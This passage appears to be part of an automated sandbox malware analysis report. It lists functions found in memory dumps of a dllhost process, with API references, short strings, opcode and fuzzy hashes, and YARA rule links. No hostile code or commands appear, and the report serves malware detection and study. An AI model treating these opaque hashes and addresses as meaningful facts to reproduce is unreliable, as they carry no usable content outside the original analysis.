Instruction ID: 1c0ff775b215d5f909739b705bf9ef11f2d485c61b6f6b37211ebb8e064e02b2
Opcode Fuzzy Hash: 2bceda2a2df59ee45f653468aae4920ff2d730ff1de33914653738577d68f5e0
Instruction Fuzzy Hash: B401D1715042448FEB10CF15E9857A6FBE4EF04725F08C8AADD498F652D375E844CAA2

Function 0082A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0082A6A8

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 051787bad0ce8929e3d621517874baf354282595f91931ca3ce1ff671c2e8a0f
Instruction ID: 2b363da6e4dd20f90705bd4058d948de9a881a597157585d80b89e44427d788d
Opcode Fuzzy Hash: 051787bad0ce8929e3d621517874baf354282595f91931ca3ce1ff671c2e8a0f
Instruction Fuzzy Hash: 6DF08C745046449FEB108F16E985761FBE4EF14324F1CC49ADE098B262D375E894CAA2

Function 0082B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082B468

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: df9bf94e18ee4f387027c6525c552f15976e0971cf0d44bea61602c3aa60a1fc
Instruction ID: fa332e9ecbeb694b7fb277aa9a0b201107fede77d1fb660eca0bc05a8f217b8d
Opcode Fuzzy Hash: df9bf94e18ee4f387027c6525c552f15976e0971cf0d44bea61602c3aa60a1fc
Instruction Fuzzy Hash: B221A1725093C05FDB028B25DC94792BFB4EF47324F0984DBEC858F263D265A908CB62

Function 0082A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082A414

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 24e1cc04e31edb7c31f89708586d21f275e95305e96dc137c5299155b0f77617
Instruction ID: 06882da06b1008bd89d83211f31d9c416e1ba7c7c64d92437ea78e64f1757b4e
Opcode Fuzzy Hash: 24e1cc04e31edb7c31f89708586d21f275e95305e96dc137c5299155b0f77617
Instruction Fuzzy Hash: 9B1191715093809FDB128F25DC94B52BFA8EF46220F0884DBED89CF652D275A858CB62

Function 00B407C7 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

2, xrefs: 00B407FD

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 283227d201e7040d417a81974dc10f4c51d0a8981dcd2fdbf1248404ae83f9c7
Instruction ID: 3ae456a017487754d8aa3dada47a311b91ee620a0a4aba79d4bca065f1529500
Opcode Fuzzy Hash: 283227d201e7040d417a81974dc10f4c51d0a8981dcd2fdbf1248404ae83f9c7
Instruction Fuzzy Hash: D3F05E3491D384CFDB05ABA0991439D3BB2AF47341F60449AD251EB292CB384A09CB62

Function 0082B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082B468

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3d2859b6467187efbcb2612629310b16ef7936b7274dfbf0916c741a10d34d7e
Instruction ID: f7619705c2bf648d467480fe06bcb5e51725ee3b2eb65c190a014bd0b94bbeaa
Opcode Fuzzy Hash: 3d2859b6467187efbcb2612629310b16ef7936b7274dfbf0916c741a10d34d7e
Instruction Fuzzy Hash: D101DF719052408FEB10DF19E985792FBE4EF40324F08C4ABDD49CF252D375E854CAA6

Function 0082A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0082A414

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 91f9897646d9be612b6e51b983f6fb6a9907e980d20b4ea01e97bbd01c9178a9
Instruction ID: f64a1feff6d852fd2aadc0dd9a5506662e0153e62ff4ea77e1f5d4d45b4fa0dc
Opcode Fuzzy Hash: 91f9897646d9be612b6e51b983f6fb6a9907e980d20b4ea01e97bbd01c9178a9
Instruction Fuzzy Hash: 3301DF759042409FEB10DF15E8897A6FBE4EF00324F08C4ABDD09CF252D2B5E854CAA2

Function 009A10DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 009A392A

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 37da28ef1ca5befc2c128a245737730a2253c53bb470d8b9bbd624249427f152
Instruction ID: 2747c14dce3c751f6943f6b79c5d7a00fc545ce5035cd695018a4314a316eb9d
Opcode Fuzzy Hash: 37da28ef1ca5befc2c128a245737730a2253c53bb470d8b9bbd624249427f152
Instruction Fuzzy Hash: 25F0A431A0C264CBE7504F6888143AC77A4AB47354F1D40A6DC05DB292D6798D41DBE6

Function 009A0372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 009A56AC

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: c5d28ea13a82b730246bdce0a83778d8372e70ecfd0731af727a2e89a4feac92
Instruction ID: eaa441f795a3a4ac9414f6f7c9ef7372f2ce0dfd653cca0bc217cc924a79f0ac
Opcode Fuzzy Hash: c5d28ea13a82b730246bdce0a83778d8372e70ecfd0731af727a2e89a4feac92
Instruction Fuzzy Hash: C5E086B1A085A5CFE7515F1C981534C3790AB06354F1544D6D9019B242C6794E419F96

Function 00B40295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 00B402C3

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 05c4b835149ea44b8a47b5724865e509b64b1239b3bfd587d6faf16effea5423
Instruction ID: 2091fd4409b9ff69fdeb98be58924cc2d863444c57bcd6b6469ae38eae460380
Opcode Fuzzy Hash: 05c4b835149ea44b8a47b5724865e509b64b1239b3bfd587d6faf16effea5423
Instruction Fuzzy Hash: 01E04670E00248CBDF04EFE9D95439DB7F2BF86300F608865E606EA245EB788A049B45

Function 00B4010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 00B40136

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 9d8ef50edb8368f81394c311626476edd8888b5cd0a459739d28fe75b59465b5
Instruction ID: cf2ca3782ff74a8c56cee4a991d6e91804218b0084ac1087648f1b585223369d
Opcode Fuzzy Hash: 9d8ef50edb8368f81394c311626476edd8888b5cd0a459739d28fe75b59465b5
Instruction Fuzzy Hash: A3E04634A00205CBDF04EFA099582AD76E2BB81340F5088A5EA06EB245DB388B049A45

Function 00B409AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 00B409C6

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: a976c546ff21f9c4e7753dd456fa7f241bc38aefea5c8085cad166436f831db7
Instruction ID: c7d6c7a5139640f1a6a8a4e0a9596e298bba1af0e6e4fd54886e2dcc32639180
Opcode Fuzzy Hash: a976c546ff21f9c4e7753dd456fa7f241bc38aefea5c8085cad166436f831db7
Instruction Fuzzy Hash: 4CE04638A01205CBDF00ABE0D95839E37E1FB92300F904855EA02EB241DA388B449A46

Function 00B4037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 00B403A3

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: e59c97b12320aa8fec82fac88f1c1aba9bf25667362a52d7a1aeb76eeccca3ee
Instruction ID: 0457c9bcaca96e23f3fa07996c545ee043f929dd1b190fb67969d3adb47cc14b
Opcode Fuzzy Hash: e59c97b12320aa8fec82fac88f1c1aba9bf25667362a52d7a1aeb76eeccca3ee
Instruction Fuzzy Hash: 2DD0A730A013418BDB415B60992938C3BE19F41340F948056D186AF382CE7809195781

Function 00B40639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 00B4065E

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 1dd07c9f2e05b000bb427edb0011a964e63b1a2b6e6036dd00b67dcfdcf78ba7
Instruction ID: bd090596903e026eb987f5b78430cd04b73620c4c4a209398f617f7c6ad3ed27
Opcode Fuzzy Hash: 1dd07c9f2e05b000bb427edb0011a964e63b1a2b6e6036dd00b67dcfdcf78ba7
Instruction Fuzzy Hash: 7CD0A73080B3468FCB01DB70841A3987FF0AF47310F9045D29192DB2A3DE38491D9740

Function 00B40222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 00B40237

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 17c40762b219d7b38a8d5850e9cff229a107e29756c0a03f7e4c4c0b05e45680
Instruction ID: ac99543cfa1a49ccc4a634355fa871a325a9a76411b77d29d2e04d0aa2eabf1c
Opcode Fuzzy Hash: 17c40762b219d7b38a8d5850e9cff229a107e29756c0a03f7e4c4c0b05e45680
Instruction Fuzzy Hash: E5D0C734915304CBDF44EF94D5582AD77F2FB45300F604455E102EB355CA344F549B41

Function 00B40436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 00B4044E

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 5f0c20c042e5ac2ec148b4a66521c7c54ce9af2582e19ffa8ef0e6a0550feca4
Instruction ID: c054dce8a44618fdf7fd0560b6796b646a977c2cba14cee2a085cc8686289412
Opcode Fuzzy Hash: 5f0c20c042e5ac2ec148b4a66521c7c54ce9af2582e19ffa8ef0e6a0550feca4
Instruction Fuzzy Hash: 14C04C70E11204CBEF44ABB0992D39C76E5AB85341F904459A106BA386DA784A045F51

Function 00B408B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 00B408D0

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 690c1391f74b689959546d93ecfe07a7109be70cf617f8425d05810a75880695
Instruction ID: f39bb53159da77c8c144e9a1c6d22003dc2a2c69e4145a93a5e7fd3b15992a80
Opcode Fuzzy Hash: 690c1391f74b689959546d93ecfe07a7109be70cf617f8425d05810a75880695
Instruction Fuzzy Hash: 49C04C70A01204CBDF44ABA0991879C76F1AB85341F9084596146AB385DE784A549F55

Function 00B403AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 00B403C4

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 2e799479383a99dae65baafe468fe5324ca65d74118f1770e1bf2a601fb2b29b
Instruction ID: 837da62e4a35409a5683a344aea516bace162860ce9987ab543089077342773d
Opcode Fuzzy Hash: 2e799479383a99dae65baafe468fe5324ca65d74118f1770e1bf2a601fb2b29b
Instruction Fuzzy Hash: 81C04C70A013048BDF44ABB099583AC76E5AF85341F90452D6102AB386DF7849149B41

Function 00B40415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 00B4042A

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 504494e5c893d23dc26af80103fdf87b49a5adb75de53b0d3988d178df854fcb
Instruction ID: d25648ef4f9864cdf817a2fcd2232ba7e86a2f8c0c37ec680ee1678c9bcce7fe
Opcode Fuzzy Hash: 504494e5c893d23dc26af80103fdf87b49a5adb75de53b0d3988d178df854fcb
Instruction Fuzzy Hash: 1EC04C74E01244CBEF54ABB0952879C76E1AB85341F908419A512AB386DA7845045F41

Function 00B408DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 00B408F4

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: d2be698edeec3ce13eade6d0882a4646c5930f3567bc2d898b562f610ded2347
Instruction ID: 044fe93dae645199b05fb937231f9eb10e2c9b0499160b68beef1b2a51958c00
Opcode Fuzzy Hash: d2be698edeec3ce13eade6d0882a4646c5930f3567bc2d898b562f610ded2347
Instruction Fuzzy Hash: 6DC04C70A02204CBEF44ABB0951979C76E5AB85340F904459A60AAA386DA784B049B45

Function 00B40500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 00B40515

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 8e7d9e121d3bf6a41a6741a68ca447d65d0fc8668bc751a0063c8859b935d939
Instruction ID: 6af57c62d994df29e85e71d9bd544311afafd0d12a23b06b159b1feb9cafa6e8
Opcode Fuzzy Hash: 8e7d9e121d3bf6a41a6741a68ca447d65d0fc8668bc751a0063c8859b935d939
Instruction Fuzzy Hash: 71C04C70A022048BDF44ABB0951839D76E5AB85384FA044296502AB385DA794B14DB41

Function 00B40340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 00B40358

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: afaa1bf0102c7d777818e066addef5616564c3c5984d25654d3708d96a86c2db
Instruction ID: 2839607189a9cb9af0a5f0d53e4bc9ea7158b441ab43ebc1959f3c0b0e9b93d6
Opcode Fuzzy Hash: afaa1bf0102c7d777818e066addef5616564c3c5984d25654d3708d96a86c2db
Instruction Fuzzy Hash: 4EC04C70A022048BDF94AFB0955939C76E5AB86341F908459A10AAA395DE784A449B81

Function 00B404C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 00B404DE

Memory Dump Source

Source File: 00000027.00000002.2185108466.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_b40000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 8d147d1a0cd961a5c4047a3a6186930c7c473f8862db4f1c12e072e09c4228da
Instruction ID: 4c77d6963eaab704cdc6869314fbccf4ba7e724b8d18533dc720b2bee619be93
Opcode Fuzzy Hash: 8d147d1a0cd961a5c4047a3a6186930c7c473f8862db4f1c12e072e09c4228da
Instruction Fuzzy Hash: D8C04C70A01204CBDF44ABA0951839D76E5AB85381F908419A506BB385DA784604DF41

Function 009AF298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867263f17cafa8f944dbe96195521113b33c35bac032d48faf8d6e078f84a080
Instruction ID: 7e8651688dfa6e30ca0735a97b5d613066661e2c48a42dca2c90f51734f87489
Opcode Fuzzy Hash: 867263f17cafa8f944dbe96195521113b33c35bac032d48faf8d6e078f84a080
Instruction Fuzzy Hash: 04211434A0430ADBDF50EFE4E9183ADB7A0FF81348F108879E50697254EF748A04DB92

Function 009505E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184167245.0000000000950000.00000040.00000020.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_950000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59f23ffccc89a9e5d20e182d48469fd9f4c7642bebfb8ce6f2834b54e5093458
Instruction ID: aa5e2ad040d2f47d84b13dc24f4ce600d2e491d8d6cadca8fc1a21f4f78b1992
Opcode Fuzzy Hash: 59f23ffccc89a9e5d20e182d48469fd9f4c7642bebfb8ce6f2834b54e5093458
Instruction Fuzzy Hash: 240186B650D7846FD7128F169C51872FFE8DF86620709C49FEC498B652D125AC08CB72

Function 009A0006 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c624399561b0b3150b37965c2dbb97b598518e16ed90fe7edb5a21ac206b204
Instruction ID: 300e177201fd84443481db50ea0ec512d44de3420e402581b9d57d77752af85e
Opcode Fuzzy Hash: 4c624399561b0b3150b37965c2dbb97b598518e16ed90fe7edb5a21ac206b204
Instruction Fuzzy Hash: A001525548E7D2AFE30383740CB8649BFB06E53105B1E82DB84C0CB5E7EA0C984AD3A2

Function 009A206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabe85685f5bda22fd9ec9006692752fa7f2493a9103ba4ff00e4ae8d08dffd9
Instruction ID: 9b5d0ef2638718e1535229ed6439b9c0e6ce09d4d86d330158e23ba238027d5c
Opcode Fuzzy Hash: fabe85685f5bda22fd9ec9006692752fa7f2493a9103ba4ff00e4ae8d08dffd9
Instruction Fuzzy Hash: A4F04974A04615CBDB949F28D89876CB7B1BBC6311F10C8A5E94693390CE788F84CFC0

Function 009A1704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcc3edb78455295dc6580df54a2a5c818977c3aa466424968b98224e5dcd03a
Instruction ID: 4be03fdea075549af95719679e99d555152ffd5ecc093868462b441277607ca8
Opcode Fuzzy Hash: 5fcc3edb78455295dc6580df54a2a5c818977c3aa466424968b98224e5dcd03a
Instruction Fuzzy Hash: 40F0F9B4B05155CBDB549F25DD587ACB7B1BBCA311F0488A5E90A96290DF748A44CF80

Function 00950606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184167245.0000000000950000.00000040.00000020.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_950000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb73f29963e2253c5fb8de19a740d3d176c2b2905eee603994f9257407454e8
Instruction ID: eac7dd7109b3d0a9d1b122886cc08f2f8b92d2eb777ecacc3a2f83fcda3cb0b4
Opcode Fuzzy Hash: cfb73f29963e2253c5fb8de19a740d3d176c2b2905eee603994f9257407454e8
Instruction Fuzzy Hash: F3E092B66046005B9750DF0BEC41462F7D8EB84630718C07FDC0D8B711D675F904CAB5

Function 009A15D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aadac687e16dfcb6f5eb7b958b5da5e6bb83a4291cb7c812060ace3b022bfe4
Instruction ID: d40b26644147fbc2c6792cfa49dfe380899245ae358b9e3d7fd939b6fa8f6d96
Opcode Fuzzy Hash: 8aadac687e16dfcb6f5eb7b958b5da5e6bb83a4291cb7c812060ace3b022bfe4
Instruction Fuzzy Hash: ED017EB4D00629CFCB60CF14CD80BD9B7B1BB8A205F0085EA964DA2211EB316E84DF59

Function 009A6D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441c74471807385c9ad37b10e8037ef77d46dd0caeb0ce3c20aa4afd3040398f
Instruction ID: 6ce7774874322579d13d2f1585dfe197ed8625d2d8c7b6e979f2ca7813615346
Opcode Fuzzy Hash: 441c74471807385c9ad37b10e8037ef77d46dd0caeb0ce3c20aa4afd3040398f
Instruction Fuzzy Hash: CFF02B30B002049BCB24A7B0BC0C3A97799FBC6741F044868D902C33C0DFB95E448392

Function 009A2E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742b9258dd13c3827d16b5207b01708df147164a8ac36073302b9f2865ca89b1
Instruction ID: e3fa786737983b78e1bdc7c151d69e9eb274803d6cc73f89ba37da39073424e3
Opcode Fuzzy Hash: 742b9258dd13c3827d16b5207b01708df147164a8ac36073302b9f2865ca89b1
Instruction Fuzzy Hash: 54E08630B08151DFEB405F64DC1476D77B4BB46311F094475A849D3381D6344E40CFA1

Function 009A3A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c8e569c8ea9293c53b15f99583b49ef85a3d42f33f8bfbab245ae3c614757e
Instruction ID: b22643e3034462c2affa5ef42b7628a8c39230280b454ec77a98db289ae1cdbe
Opcode Fuzzy Hash: 91c8e569c8ea9293c53b15f99583b49ef85a3d42f33f8bfbab245ae3c614757e
Instruction Fuzzy Hash: 79E0C230708461CFEB809B1CC90435C33E0BB0B350F5980A6E906DB392CB798D809FD6

Function 008223F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2180539977.0000000000822000.00000040.00000800.00020000.00000000.sdmp, Offset: 00822000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_822000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb44f62a00fff67ff45c575d3be90eb31ced13f26a171d47c1ce90fbbf9d0b0
Instruction ID: 9418ebbe93bad4d5b151a00edd44926a4c6a78a0c704a876534af64b3716141f
Opcode Fuzzy Hash: 7eb44f62a00fff67ff45c575d3be90eb31ced13f26a171d47c1ce90fbbf9d0b0
Instruction Fuzzy Hash: DAD02E392096908FE312EA0CD1A4B8537D4FB40714F0A00FAAC00CB363C368D8C0C600

Function 008223BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2180539977.0000000000822000.00000040.00000800.00020000.00000000.sdmp, Offset: 00822000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_822000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21153bf89d95f6b4d20a9dcf1ba0ca8d0fffd42632ff17faa5b7b2fc7a535160
Instruction ID: c01c210b4621316bd596222263ba5ae1d60af8e4ab79a7694aee3392389abbc1
Opcode Fuzzy Hash: 21153bf89d95f6b4d20a9dcf1ba0ca8d0fffd42632ff17faa5b7b2fc7a535160
Instruction Fuzzy Hash: 7CD05E346052814BDB19DA0CD2D8F5933D4BF44714F0644E8AC10CB372C7A8D8C0CA00

Function 009A6998 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_9a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f09daf410d36d1c0c8d3bd305959540f57ecaf063c0e06670011d282ee4853b2
Instruction ID: 729e8cb899b45cf2d0c4976fc59d71d97c99733078e1a9e2be545681f5685bfa
Opcode Fuzzy Hash: f09daf410d36d1c0c8d3bd305959540f57ecaf063c0e06670011d282ee4853b2
Instruction Fuzzy Hash: F8D0C93018D3D19FC3039B2C88744943FB09F0790474A00E6D1C8CF4B3D7149826C792

Function 009A110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2184829758.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

